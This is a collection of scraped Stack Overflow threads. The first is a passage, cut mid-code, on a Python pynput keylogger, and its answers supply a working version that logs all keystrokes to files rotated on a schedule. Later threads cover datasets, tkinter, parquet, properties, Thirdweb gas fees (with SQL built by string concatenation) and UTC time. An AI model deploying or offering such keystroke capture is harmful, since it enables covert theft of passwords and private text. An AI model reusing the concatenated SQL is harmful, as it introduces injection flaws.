if (len(glo.line) > 50) or (txt=='<enter>'):
writeFile( glo.fh, glo.line+'\n')
glo.line = ''
def writeFile( fh, txt):
fh.write( txt)
def openFile():
from datetime import datetime
dt=datetime.now().strftime('%d%m%Y-%H%M%S')
fh = open( 'log-'+str(dt)+'.txt', 'w') # open (or reopen)
return fh
def closeFile( fh):
fh.close()
def closeAndReOpen( fh, line):
if len( line) > 0:
writeFile( fh, line+'\n')
closeFile( fh)
fh = openFile()
return fh
class Ticker():
def __init__( self, sched=None, func=None, parm=None):
# 2 modes: if func is supplied, tick() will not return. Everything will be internal.
# if func is not supplied, it's non-blocking. The callback and sleep must be external.
self.target = None
self.sched = sched
self.func = func
self.parm = parm
def selectTarget( self):
for tim in self.sched: # select next target time (they are in ascending order)
if tim > self.actual:
self.target = tim
break
else: self.target = self.sched[0]
self.today = (self.actual < self.target) # True if target is today.
def tick( self):
from datetime import datetime
while True:
self.actual = datetime.now().strftime( "%H:%M:%S")
if not self.target: self.selectTarget()
if self.actual < self.target: self.today = True
act = (self.actual >= self.target) and self.today # True if target reached
if act: self.target = '' # next tick will select a new target
if not self.func: break # Non-blocking mode: upper level will sleep and call func
# The following statements are only executed in blocking mode
if act: self.func( self.parm)
time.sleep(1)
return act # will return only if func is not defined
class Glo:
pass
glo = Glo()
glo.fh = None
glo.line = ''
glo.fini = False
glo.fh = openFile()
listener = Listener( on_press=on_press)
listener.start()
ticker = Ticker( sched=schedule) # start ticker in non-blocking mode.
while not glo.fini:
import time
time.sleep(1)
if ticker.tick():
# time to close and reopen
glo.fh = closeAndReOpen( glo.fh, glo.line)
glo.line = ''
listener.stop()
writeFile( glo.fh, glo.line+'\n')
closeFile( glo.fh)
exit()
If you're satisfied, you may mark the answer as "ACCEPTed".
| How to automatically save text file after specific time in python? | This is my keylogger code:
import pynput
from pynput.keyboard import Key, Listener
from datetime import datetime, timedelta, time
import time
start = time.time()
now=datetime.now()
dt=now.strftime('%d%m%Y-%H%M%S')
keys=[]
def on_press(key):
keys.append(key)
write_file(keys)
try:
print(key.char)
except AttributeError:
print(key)
def write_file(keys):
with open ('log-'+str(dt)+'.txt','w') as f:
for key in keys:
# end=time.time()
# tot_time=end-start
k=str(key).replace("'","")
f.write(k.replace("Key.space", ' ').replace("Key.enter", '\n'))
# if tot_time>5.0:
# f.close()
# else:
# continue
with Listener(on_press=on_press) as listener:
listener.join()
In write_file() function, I've used the close method and also the timer which should automatically save the file after 5 seconds, but that gives me a long 1 paged error whose last line says:
ValueError: I/O operation on closed file.
How do I make my program save the txt file after every 5 seconds and create a new txt file automatically?
NOTE: I actually want the log file to be generated automatically after every 4 hours so that it is not flooded with uncountable words. I've just taken 5 seconds as an example.
| [
"The most important problem is that you did not reset the timer. After f.close(), end_time should be transferred into start_time.\nAlso, since you call write() for every event, there is no reason to accumulate into keys[].\nAlso, you never empty keys[].\n",
"I executed your program and found 2 problems.\nThe first one is about the start variable. Python use different namespaces for each program or function. Since start was defined at program level, it wasn't known in the function. Commenting out your timer logic was hiding the problem. You can fix the problem with the 'global' statement.\nThe second one is about \"with open\". If you use \"with open\" you must not close the file yourself. If you do, \"with open\" will not reopen the file.\nHere's a working version of your program.\nimport pynput\nfrom pynput.keyboard import Key, Listener\nfrom datetime import datetime, timedelta, time\nimport time\n\nstart = time.time()\n\nnow=datetime.now()\ndt=now.strftime('%d%m%Y-%H%M%S')\nkeys=[]\n\ndef on_press(key):\n keys.append(key)\n write_file(keys)\n try:\n print(key.char)\n except AttributeError:\n print(key)\n\ndef write_file(keys, f=None):\n global start\n for key in keys:\n k=str(key).replace(\"'\",\"\").replace(\"Key.space\", ' ').replace(\"Key.enter\", '\\n')\n\n if not f:\n f = open( 'log-'+str(dt)+'.txt', 'w') # open (or reopen)\n f.write( k)\n\n end=time.time()\n tot_time=end-start\n if tot_time>5.0:\n f.close()\n f = None\n start=end\n else:\n continue\n keys = []\n\nwith Listener(on_press=on_press) as listener:\n listener.join()\n\nA nicer solution would be move the open/close logic outside the write_file() function.\n",
"You may have to customize the first line.\nschedule = [ '08:00:00', '12:00:00', '16:00:00', '20:00:00'] # schedule for close/open file (must ascend)\n\nimport pynput\nfrom pynput.keyboard import Listener\n\ndef on_press(key):\n txt = key.char if hasattr( key, 'char') else ( '<'+key._name_+'>')\n \n # do some conversions and concatenate to line\n if txt == '<space>': txt = ' '\n if txt == None: txt = '<?key?>' # some keyboards may generate unknown codes for Multimedia\n glo.line += txt\n\n if (len(glo.line) > 50) or (txt=='<enter>'):\n writeFile( glo.fh, glo.line+'\\n')\n glo.line = ''\n \ndef writeFile( fh, txt):\n fh.write( txt)\n\ndef openFile():\n from datetime import datetime\n dt=datetime.now().strftime('%d%m%Y-%H%M%S')\n fh = open( 'log-'+str(dt)+'.txt', 'w') # open (or reopen)\n return fh\n\ndef closeFile( fh):\n fh.close()\n\ndef closeAndReOpen( fh, line):\n if len( line) > 0:\n writeFile( fh, line+'\\n')\n closeFile( fh)\n fh = openFile()\n return fh\n \nclass Ticker():\n def __init__( self, sched=None, func=None, parm=None):\n # 2 modes: if func is supplied, tick() will not return. Everything will be internal.\n # if func is not supplied, it's non-blocking. The callback and sleep must be external.\n self.target = None\n self.sched = sched\n self.func = func\n self.parm = parm\n \n def selectTarget( self):\n for tim in self.sched: # select next target time (they are in ascending order)\n if tim > self.actual:\n self.target = tim\n break\n else: self.target = self.sched[0]\n self.today = (self.actual < self.target) # True if target is today.\n\n def tick( self):\n from datetime import datetime\n while True:\n self.actual = datetime.now().strftime( \"%H:%M:%S\")\n if not self.target: self.selectTarget()\n if self.actual < self.target: self.today = True\n act = (self.actual >= self.target) and self.today # True if target reached\n if act: self.target = '' # next tick will select a new target\n if not self.func: break # Non-blocking mode: upper level will sleep and call func\n # The following statements are only executed in blocking mode\n if act: self.func( self.parm)\n time.sleep(1)\n \n return act # will return only if func is not defined\n \nclass Glo:\n pass\n\nglo = Glo()\nglo.fh = None\nglo.line = ''\nglo.fini = False\n\nglo.fh = openFile()\nlistener = Listener( on_press=on_press)\nlistener.start()\nticker = Ticker( sched=schedule) # start ticker in non-blocking mode.\n\nwhile not glo.fini:\n import time\n time.sleep(1)\n if ticker.tick():\n # time to close and reopen\n glo.fh = closeAndReOpen( glo.fh, glo.line)\n glo.line = ''\n\nlistener.stop()\nwriteFile( glo.fh, glo.line+'\\n')\ncloseFile( glo.fh)\nexit()\n\nIf you're satisfied, you may mark the answer as \"ACCEPTed\".\n"
] | [
1,
0,
0
] | [] | [] | [
"keylogger",
"python"
] | stackoverflow_0074534026_keylogger_python.txt |
Q:
Dataset for a python application
I am working on an application to predict a disease from it's symptoms, I have some trouble making a dataset.
If someone has a dataset on this, please link it to drive and share it here.
Also, I have a question on a good model for this (sklearn only). I am currently using a decision tree classifier as my model for the project. Give suggestions if you have any.
Thank you for reading.
EDIT: Got the solution
A:
You can make your own from this csv template:
Sickness, Symptom1, Symptom2, Symptom4
Covid-19, Cough, Loss of taste, Fever, Chills
Common Cold, Sneezing, Cough, Runny Nose, Headache
ignore bullet points, just for formatting. then use pandas read csv to read the data. if u need more help @mention me
A:
I see that you are having trouble finding a dataset. I made a quick search, and i found this one in kaggle. It would require preprocessing, since many of the symptoms are nulls in the columns. Maybe you could make it so each column is a specific sympton, with values 1 (or 0) if the symptom is (or isn't) present. This would have the problem that the number of 0s would be very high. You can try that and see if it works.
You can also see another implementation with Random Forest in this link, with very different preprocessing. It is an advanced model of Decision Tree. However, the Decision Tree is more interpretable, if that is what you need.
| Dataset for a python application | I am working on an application to predict a disease from it's symptoms, I have some trouble making a dataset.
If someone has a dataset on this, please link it to drive and share it here.
Also I have a question on a good model for this(sklearn only). I am currently using decision tree classifier as my model for the project. Give suggestions if you have any.
Thank you for reading.
EDIT: Got the solution
| [
"You can make your own from this csv template:\n\nSickness, Symptom1, Symptom2, Symptom4\nCovid-19, Cough, Loss of taste, Fever, Chills\nCommon Cold, Sneezing, Cough, Runny Nose, Headache\n\nignore bullet points, just for formatting. then use pandas read csv to read the data. if u need more help @mention me\n",
"I see that you are having trouble finding a dataset. I made a quick search, and i found this one in kaggle. It would require preprocessing, since many of the symptoms are nulls in the columns. Maybe you could make it so each column is a specific sympton, with values 1 (or 0) if the symptom is (or isn't) present. This would have the problem that the number of 0s would be very high. You can try that and see if it works.\nYou can also see another implementation with Random Forest in this link, with very different preprocessing. It is an advanced model of Decision Tree. However, the Decision Tree is more interpretable, if that is what you need.\n"
] | [
0,
0
] | [] | [] | [
"data_science",
"dataset",
"machine_learning",
"python",
"scikit_learn"
] | stackoverflow_0074603450_data_science_dataset_machine_learning_python_scikit_learn.txt |
Q:
TKinter app - not showing frames in oop approach
Something must have gone wrong in my TKinter project when I restructured the code to conform to the OOP paradigm.
The MainFrame is no longer displayed. I would expect a red frame after running the code below, but it just shows a blank window.
import tkinter as tk
from tkinter import ttk
class App(tk.Tk):
def __init__(self):
super().__init__()
self.title("App")
self.geometry("800x600")
main_frame = MainFrame(self)
main_frame.tkraise()
class MainFrame(ttk.Frame):
def __init__(self, container):
super().__init__(container)
s = ttk.Style()
s.configure("top_frame.TFrame", background="red")
self.my_frame = ttk.Frame(self, style="top_frame.TFrame")
self.my_frame.pack(fill="both", expand=True)
if __name__ == "__main__":
app = App()
app.mainloop()
A:
You should also manage the geometry of your MainFrame inside the App, for example by packing it:
import tkinter as tk
from tkinter import ttk
class App(tk.Tk):
def __init__(self):
super().__init__()
self.title("App")
self.geometry("800x600")
main_frame = MainFrame(self)
main_frame.pack(fill='both', expand=True) # PACKING FRAME
main_frame.tkraise()
class MainFrame(ttk.Frame):
def __init__(self, container):
super().__init__(container)
s = ttk.Style()
s.configure("top_frame.TFrame", background="red")
self.my_frame = ttk.Frame(self, style="top_frame.TFrame")
self.my_frame.pack(fill="both", expand=True)
if __name__ == "__main__":
app = App()
app.mainloop()
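For completeness, a hedged sketch of the same fix with grid instead of pack — the row/column weights are what lets the frame expand to fill the window (this goes inside App.__init__ as above):
main_frame = MainFrame(self)
main_frame.grid(row=0, column=0, sticky="nsew")  # GRIDDING FRAME
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)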
| TKinter app - not showing frames in oop approach | Something must have gone wrong in my TKinter project when I restructured the code to conform to the OOP paradigm.
The MainFrame is no longer displayed. I would expect a red frame after running the code below, but it just shows a blank window.
import tkinter as tk
from tkinter import ttk
class App(tk.Tk):
def __init__(self):
super().__init__()
self.title("App")
self.geometry("800x600")
main_frame = MainFrame(self)
main_frame.tkraise()
class MainFrame(ttk.Frame):
def __init__(self, container):
super().__init__(container)
s = ttk.Style()
s.configure("top_frame.TFrame", background="red")
self.my_frame = ttk.Frame(self, style="top_frame.TFrame")
self.my_frame.pack(fill="both", expand=True)
if __name__ == "__main__":
app = App()
app.mainloop()
| [
"You should also manage the geometry of your MainFrame inside the App, for example by packing it:\nimport tkinter as tk\nfrom tkinter import ttk\n\nclass App(tk.Tk):\n def __init__(self):\n super().__init__()\n self.title(\"App\")\n self.geometry(\"800x600\")\n\n main_frame = MainFrame(self)\n main_frame.pack(fill='both', expand=True) # PACKING FRAME\n main_frame.tkraise()\n\n\nclass MainFrame(ttk.Frame):\n def __init__(self, container):\n super().__init__(container)\n s = ttk.Style()\n s.configure(\"top_frame.TFrame\", background=\"red\")\n self.my_frame = ttk.Frame(self, style=\"top_frame.TFrame\")\n self.my_frame.pack(fill=\"both\", expand=True)\n\nif __name__ == \"__main__\":\n app = App()\n app.mainloop()\n\n"
] | [
1
] | [] | [] | [
"python",
"tkinter",
"user_interface"
] | stackoverflow_0074602995_python_tkinter_user_interface.txt |
Q:
How to convert CSV to parquet file without RLE_DICTIONARY encoding?
I've already tested three ways of converting a csv file to a parquet file. You can find them below. All three created the parquet file. I've tried to view the contents of the parquet file using "APACHE PARQUET VIEWER" on Windows and I always get the following error message:
"encoding RLE_DICTIONARY is not supported"
Is there any way to avoid this?
Maybe a way to use another type of encoding?...
Below the code:
1º Using pandas:
import pandas as pd
df = pd.read_csv("filename.csv")
df.to_parquet("filename.parquet")
2º Using pyarrow:
from pyarrow import csv, parquet
table = csv.read_csv("filename.csv")
parquet.write_table(table, "filename.parquet")
3º Using dask:
from dask.dataframe import read_csv
dask_df = read_csv("filename.csv", dtype={'column_xpto': 'float64'})
dask_df.to_parquet("filename.parquet")
A:
You should set use_dictionary to False:
import pandas as pd
df = pd.read_csv("filename.csv")
df.to_parquet("filename.parquet", use_dictionary=False)
| How to convert CSV to parquet file without RLE_DICTIONARY encoding? | I've already test three ways of converting a csv file to a parquet file. You can find them below. All the three created the parquet file. I've tried to view the contents of the parquet file using "APACHE PARQUET VIEWER" on Windows and I always got the following error message:
"encoding RLE_DICTIONARY is not supported"
Is there any way to avoid this?
Maybe a way to use another type of encoding?...
Below the code:
1º Using pandas:
import pandas as pd
df = pd.read_csv("filename.csv")
df.to_parquet("filename.parquet")
2º Using pyarrow:
from pyarrow import csv, parquet
table = csv.read_csv("filename.csv")
parquet.write_table(table, "filename.parquet")
3º Using dask:
from dask.dataframe import read_csv
dask_df = read_csv("filename.csv", dtype={'column_xpto': 'float64'})
dask_df.to_parquet("filename.parquet")
| [
"You should set use_dictionary to False:\nimport pandas as pd\ndf = pd.read_csv(\"filename.csv\")\ndf.to_parquet(\"filename.parquet\", use_dictionary=False)\n\n"
] | [
0
] | [] | [] | [
"csv",
"parquet",
"python"
] | stackoverflow_0073572870_csv_parquet_python.txt |
Q:
does the @property decorator function as a getter?
I am new to Python and I'm trying to understand the use of the 'getter'. Its use case is not obvious to me.
If I use a property decorator on a method and I'm able to return a certain value, what exactly would I use 'getter' for?
class Person:
def __init__(self,name, age):
self._name = name
self._age = age
@property
def age(self):
return self._age
@age.setter
def age(self,new_age):
if isinstance(new_age,int) and 18 < new_age < 120:
self._age = new_age
A:
The @property decorator adds a default getter for a given field in a Python class, triggering a function call whenever the attribute is accessed.
It turns the age() method into a “getter” for a read-only attribute with the same name. If you want a “setter”, then add @age.setter as you did in your question.
p = Person("John", 22)
print(p.age)
Output:
22
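To see what the setter buys you, a short sketch using the class from the question — out-of-range assignments are silently ignored by the guard:
p = Person("John", 22)
p.age = 30   # routed through the setter, passes the 18 < age < 120 check
print(p.age) # 30
p.age = 150  # fails the check, so self._age is left unchanged
print(p.age) # still 30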
A:
The property type can take up to 4 separate arguments (a getter, a setter, a deleter, and a doc string) when instantiating it. The first argument is a function that will be used as a getter. The second is a function that will be used as a setter. You could have written your class as
class Person:
def __init__(self,name, age):
self._name = name
self._age = age
def _age_getter(self):
return self._age
def _age_setter(self, new_age):
...
age = property(_age_getter, _age_setter)
This is cumbersome to write, so property objects have a number of methods for building the property up piece by piece. Using property as a simple decorator creates a read-only property with the decorated function as the getter.
# Equivalent to
# def age(self):
# return self._age
# age = property(age)
@property
def age(self):
return self._age
age.setter is a method of the property instance which creates a new property that is essentially a copy of age, but with its argument used to replace whatever setter the original property had. (Decorator syntax is why all the methods involved have to have the same name, so that we are constantly replacing the original property with the new, augmented property, rather than defining multiple similar properties with different names instead.)
@age.setter
def age(self, new_age):
...
Desugaring this requires the use of a temporary variable, to avoid losing the old value of age prematurely.
old_property = age
def age(self, new_age):
...
age = old_property.setter(age)
A silly, but legal, way of defining the property takes advantage of the fact that property can be defined with no arguments, and that there is a getter method that can be used as a decorator as well. (I don't think I've ever seen it used in the wild, though.)
class Person:
def __init__(self, name, age):
...
age = property()
@age.getter
def age(self):
...
@age.setter
def age(self, new_age):
...
Note that the order in which we use getter, setter, (and deleter) methods doesn't matter. The conventional order comes from the order in which property expects its positional arguments to be supplied, as well as the fact that new properties are virtually always defined by decorating the getter directly, rather than adding a getter to a property after it is created.
| does the @property decorator function as a getter? | i am new to python and i'm trying to understand the use of the 'getter'. it's use case is not obvious to me.
if i use a property decorator on a method and im able to return a certain value, what exactly would i use 'getter' for.
class Person:
def __init__(self,name, age):
self._name = name
self._age = age
@property
def age(self):
return self._age
@age.setter
def age(self,new_age):
if isinstance(new_age,int) and 18 < new_age < 120:
self._age = new_age
| [
"The @property decorator adds a default getter on a given field in a Python class\nthat triggers a function call upon accessing a property.\nThe @property decorator turns the age() method into a “getter” for a read-only attribute with the same name. If want a “setter” then add @age.setter as you did in your question.\np = Person(\"John\", 22)\nprint(p.age)\n\nOutput:\n22\n\n",
"The property type can take up to 4 separate arguments (a getter, a setter, a deleter, and a doc string) when instantiating it. The first argument is a function that will be used as a getter. The second is a function that will be used as a setter. You could have written your class as\nclass Person:\n def __init__(self,name, age):\n self._name = name\n self._age = age\n \n def _age_getter(self):\n return self._age\n\n def _age_setter(self, new_age):\n ...\n\n age = property(_age_getter, _age_setter)\n\nThis is cumbersome to write, so property objects have a number of methods for building the property up piece by piece. Using property as a simple decorator creates a read-only property with the decorated function as the getter.\n# Equivalent to\n# def age(self):\n# return self._age\n# age = property(age)\n@property\ndef age(self):\n return self._age\n\nage.setter is a method of the property instance which creates a new property that is essentially a copy of age, but with its argument used to replace whatever setter the original property had. (Decorator syntax is why all the methods involved have to have the same name, so that we are constantly replacing the original property with the new, augmented property, rather than defining multiple similar properties with different names instead.)\[email protected]\ndef age(self, new_age):\n ...\n\nDesugaring this requires the use of a temporary variable, to avoid losing the old value of age prematurely.\nold_property = age\ndef age(self, new_age):\n ...\nage = old_property.setter(age)\n\nA silly, but legal, way of defining the property takes advantage of the fact that property can be defined with no arguments, and that there is a getter method that can be used as a decorator as well. (I don't think I've ever seen it used in the wild, though.)\nclass Person:\n def __init__(self, name, age):\n ...\n\n age = property()\n\n @age.getter\n def age(self):\n ...\n\n @age.setter\n def age(self, new_age):\n ...\n\nNote that the order in which we use getter, setter, (and deleter) methods doesn't matter. The conventional order comes from the order in which property expects its positional arguments to be supplied, as well as the fact that new properties are virtually always defined by decorating the getter directly, rather than adding a getter to a property after it is created.\n"
] | [
2,
1
] | [] | [] | [
"getter",
"properties",
"python",
"python_decorators"
] | stackoverflow_0074603360_getter_properties_python_python_decorators.txt |
Q:
How can i fix the gas price issue in Thirdweb Python SDK Goerli TestNet
I'm working with the Thirdweb Python SDK. The code below sometimes works and sometimes throws a gas price issue. I think it could be a network issue, because it sometimes works and generates the NFT, but not always.
When I do get an error, it is about the gas price, yet the Thirdweb API does not seem to expose a gas price argument or anything like that.
Any ideas?
Code:
sqlcol="SELECT ID,(SELECT contrato FROM colecciones WHERE ID=idcolec) AS contratonft FROM solicitudcert WHERE ID='" + idsolicitud + "' LIMIT 0, 1"
mycursor.execute(sqlcol)
misolicitud = mycursor.fetchone()
if(misolicitud):
contratonft_aux=str(misolicitud[1])
contratonft=contratonft_aux.replace('"','')
sdk = ThirdwebSDK.from_private_key(PRIVATE_KEY, NETWORK)
NFT_COLLECTION_ADDRESS = contratonft
nft_collection = sdk.get_nft_collection(NFT_COLLECTION_ADDRESS)
urlarchivoarr=imagencert.split("/")
urlarchivostr=str(urlarchivoarr[1]);
urlarchivoimg="https://files.avfenixrecords.com/" + urlarchivostr
# You can pass in any address here to mint the NFT to
tx = nft_collection.mint(NFTMetadataInput.from_json({
"name": nombrecert,
"description": descripcert,
"image": urlarchivoimg
}))
idnft=tx.id
return jsonify({'status':'OK','IDNFT':idnft})
else:
return jsonify({'status':'ERROR','IDNFT':"NULL"})
Error:
[2022-11-15 19:54:21,628] ERROR in app: Exception on /api/contracts/v1/mintnft [POST]
Traceback (most recent call last):
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask/app.py", line 2525, in wsgi_app
response = self.full_dispatch_request()
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask/app.py", line 1822, in full_dispatch_request
rv = self.handle_user_exception(e)
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask_cors/extension.py", line 165, in wrapped_function
return cors_after_request(app.make_response(f(*args, **kwargs)))
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask/app.py", line 1820, in full_dispatch_request
rv = self.dispatch_request()
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask/app.py", line 1796, in dispatch_request
return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
File "app.py", line 1851, in mintnft
tx = nft_collection.mint(NFTMetadataInput.from_json({
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/thirdweb/contracts/nft_collection.py", line 135, in mint
return self.mint_to(self._contract_wrapper.get_signer_address(), metadata)
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/thirdweb/contracts/nft_collection.py", line 166, in mint_to
receipt = self._contract_wrapper.send_transaction("mint_to", [to, uri])
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/thirdweb/core/classes/contract_wrapper.py", line 113, in send_transaction
tx = getattr(self._contract_abi, fn).build_transaction(
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/thirdweb/abi/token_erc721.py", line 1638, in build_transaction
return self._underlying_method(to, uri).buildTransaction(
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/contract.py", line 1079, in buildTransaction
return build_transaction_for_function(
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/contract.py", line 1648, in build_transaction_for_function
prepared_transaction = fill_transaction_defaults(web3, prepared_transaction)
File "cytoolz/functoolz.pyx", line 249, in cytoolz.functoolz.curry.__call__
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/_utils/transactions.py", line 114, in fill_transaction_defaults
default_val = default_getter(web3, transaction)
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/_utils/transactions.py", line 60, in <lambda>
'gas': lambda web3, tx: web3.eth.estimate_gas(tx),
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/eth.py", line 825, in estimate_gas
return self._estimate_gas(transaction, block_identifier)
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/module.py", line 57, in caller
result = w3.manager.request_blocking(method_str,
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/manager.py", line 198, in request_blocking
return self.formatted_response(response,
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/manager.py", line 171, in formatted_response
raise ValueError(response["error"])
ValueError: {'code': -32000, 'message': 'err: max fee per gas less than block base fee: address 0x98E0463643b28E24223d2B5EF19E78A9AF031505, maxFeePerGas: 70565183066 baseFee: 77047968359 (supplied gas 22141296)'}
I tried to modify the contract's configuration in the Thirdweb dashboard, without success.
A:
What network are you seeing this issue on? We can add in a method to manually overwrite gas limits in the SDK.
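In the meantime, the error message itself points at a workaround: the transaction's maxFeePerGas (~70.5 gwei) was below the block's base fee (~77 gwei), so any fee cap comfortably above the current base fee would go through. A hedged sketch of computing such a cap with plain web3.py, outside the Thirdweb wrapper (the RPC URL is a placeholder):
from web3 import Web3

w3 = Web3(Web3.HTTPProvider("https://your-goerli-rpc"))  # placeholder RPC URL
base_fee = w3.eth.get_block("latest")["baseFeePerGas"]
priority_fee = w3.eth.max_priority_fee  # tip suggested by the node
# Common heuristic: twice the base fee plus the tip, so the transaction
# survives base-fee increases over the next few blocks.
tx_params = {
    "maxFeePerGas": 2 * base_fee + priority_fee,
    "maxPriorityFeePerGas": priority_fee,
}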
| How can i fix the gas price issue in Thirdweb Python SDK Goerli TestNet | Im working with the Thirdweb Python SDK API. The code below sometimes work and sometimes throws a gasprice issue. I think it could be a network issue, because it works sometimes and generates the NFT but not always.
And when i got an error it is about gasprice. But in the Thirdweb API doesnt appear a gasprice argument or someting like this.
Any ideas?
Code:
sqlcol="SELECT ID,(SELECT contrato FROM colecciones WHERE ID=idcolec) AS contratonft FROM solicitudcert WHERE ID='" + idsolicitud + "' LIMIT 0, 1"
mycursor.execute(sqlcol)
misolicitud = mycursor.fetchone()
if(misolicitud):
contratonft_aux=str(misolicitud[1])
contratonft=contratonft_aux.replace('"','')
sdk = ThirdwebSDK.from_private_key(PRIVATE_KEY, NETWORK)
NFT_COLLECTION_ADDRESS = contratonft
nft_collection = sdk.get_nft_collection(NFT_COLLECTION_ADDRESS)
urlarchivoarr=imagencert.split("/")
urlarchivostr=str(urlarchivoarr[1]);
urlarchivoimg="https://files.avfenixrecords.com/" + urlarchivostr
# You can pass in any address here to mint the NFT to
tx = nft_collection.mint(NFTMetadataInput.from_json({
"name": nombrecert,
"description": descripcert,
"image": urlarchivoimg
}))
idnft=tx.id
return jsonify({'status':'OK','IDNFT':idnft})
else:
return jsonify({'status':'ERROR','IDNFT':"NULL"})
Error:
[2022-11-15 19:54:21,628] ERROR in app: Exception on /api/contracts/v1/mintnft [POST]
Traceback (most recent call last):
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask/app.py", line 2525, in wsgi_app
response = self.full_dispatch_request()
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask/app.py", line 1822, in full_dispatch_request
rv = self.handle_user_exception(e)
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask_cors/extension.py", line 165, in wrapped_function
return cors_after_request(app.make_response(f(*args, **kwargs)))
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask/app.py", line 1820, in full_dispatch_request
rv = self.dispatch_request()
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask/app.py", line 1796, in dispatch_request
return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
File "app.py", line 1851, in mintnft
tx = nft_collection.mint(NFTMetadataInput.from_json({
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/thirdweb/contracts/nft_collection.py", line 135, in mint
return self.mint_to(self._contract_wrapper.get_signer_address(), metadata)
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/thirdweb/contracts/nft_collection.py", line 166, in mint_to
receipt = self._contract_wrapper.send_transaction("mint_to", [to, uri])
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/thirdweb/core/classes/contract_wrapper.py", line 113, in send_transaction
tx = getattr(self._contract_abi, fn).build_transaction(
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/thirdweb/abi/token_erc721.py", line 1638, in build_transaction
return self._underlying_method(to, uri).buildTransaction(
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/contract.py", line 1079, in buildTransaction
return build_transaction_for_function(
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/contract.py", line 1648, in build_transaction_for_function
prepared_transaction = fill_transaction_defaults(web3, prepared_transaction)
File "cytoolz/functoolz.pyx", line 249, in cytoolz.functoolz.curry.__call__
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/_utils/transactions.py", line 114, in fill_transaction_defaults
default_val = default_getter(web3, transaction)
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/_utils/transactions.py", line 60, in <lambda>
'gas': lambda web3, tx: web3.eth.estimate_gas(tx),
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/eth.py", line 825, in estimate_gas
return self._estimate_gas(transaction, block_identifier)
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/module.py", line 57, in caller
result = w3.manager.request_blocking(method_str,
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/manager.py", line 198, in request_blocking
return self.formatted_response(response,
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/manager.py", line 171, in formatted_response
raise ValueError(response["error"])
ValueError: {'code': -32000, 'message': 'err: max fee per gas less than block base fee: address 0x98E0463643b28E24223d2B5EF19E78A9AF031505, maxFeePerGas: 70565183066 baseFee: 77047968359 (supplied gas 22141296)'}
I tried to modify the contracts config into the thirdweb dashboard without success.
| [
"What network are you seeing this issue on? We can add in a method to manually overwrite gas limits in the SDK.\n"
] | [
1
] | [] | [] | [
"price",
"python",
"sdk",
"thirdweb"
] | stackoverflow_0074447448_price_python_sdk_thirdweb.txt |
Q:
How to get UTC time in Python?
How do I get the UTC time, i.e. milliseconds since Unix epoch on Jan 1, 1970?
A:
For Python 2 code, use datetime.utcnow():
from datetime import datetime
datetime.utcnow()
For Python 3, use datetime.now(timezone.utc) (the 2.x solution will technically work, but has a giant warning in the 3.x docs):
from datetime import datetime, timezone
datetime.now(timezone.utc)
For your purposes when you need to calculate an amount of time spent between two dates all that you need is to subtract end and start dates. The results of such subtraction is a timedelta object.
From the python docs:
class datetime.timedelta([days[, seconds[, microseconds[, milliseconds[, minutes[, hours[, weeks]]]]]]])
This means that by default you can get any of the fields mentioned in its definition -
days, seconds, microseconds, milliseconds, minutes, hours, weeks. Also, a timedelta instance has a total_seconds() method that:
Return the total number of seconds contained in the duration.
Equivalent to (td.microseconds + (td.seconds + td.days * 24 * 3600) *
10**6) / 10**6 computed with true division enabled.
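For example, a small sketch of measuring a span between two UTC timestamps (the names are illustrative):
from datetime import datetime, timezone

start = datetime.now(timezone.utc)
# ... work happens here ...
end = datetime.now(timezone.utc)
elapsed = end - start            # a timedelta object
print(elapsed.total_seconds())   # float seconds between the two instants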
A:
Timezone-aware datetime object, unlike datetime.utcnow():
from datetime import datetime,timezone
now_utc = datetime.now(timezone.utc)
Timestamp in milliseconds since Unix epoch:
datetime.now(timezone.utc).timestamp() * 1000
A:
In the form closest to your original:
import datetime
def UtcNow():
now = datetime.datetime.utcnow()
return now
